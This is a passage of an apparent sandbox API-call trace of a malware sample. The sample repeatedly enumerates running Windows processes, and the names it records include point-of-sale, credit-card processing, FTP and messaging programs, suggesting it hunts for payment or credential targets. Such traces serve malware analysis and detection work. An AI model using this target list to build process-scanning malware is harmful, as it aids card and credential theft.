szExeFile="whatsapp.exe")) returned 1 [0228.828] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0228.830] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0228.833] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0228.835] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0228.844] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0228.846] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0228.848] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0228.850] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0228.853] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0228.859] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0228.861] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0228.863] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0228.865] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0228.868] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0228.873] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0228.875] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0228.877] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0228.880] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0228.882] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0228.884] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0228.938] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0228.940] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0228.942] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.944] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0228.946] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0228.948] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0228.953] CloseHandle (hObject=0xdc4) returned 1 [0228.953] Sleep (dwMilliseconds=0x64) [0229.099] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2278 [0229.133] Process32First (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.138] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0229.140] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0229.142] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.144] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0229.146] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.148] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0229.150] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0229.156] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0229.158] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.160] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.161] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0229.163] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.164] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.165] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.200] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.257] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.259] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.261] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.263] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0229.264] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0229.266] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0229.268] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.269] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.270] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0229.272] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0229.273] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0229.274] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0229.279] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.280] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0229.281] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0229.283] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.285] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0229.286] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0229.287] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0229.289] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0229.290] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0229.341] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0229.427] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0229.429] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0229.430] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0229.431] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0229.436] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0229.437] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0229.439] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0229.440] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0229.441] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0229.443] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0229.445] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0229.446] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0229.447] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0229.449] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0229.453] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0229.454] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0229.456] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0229.457] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0229.458] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0229.460] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, 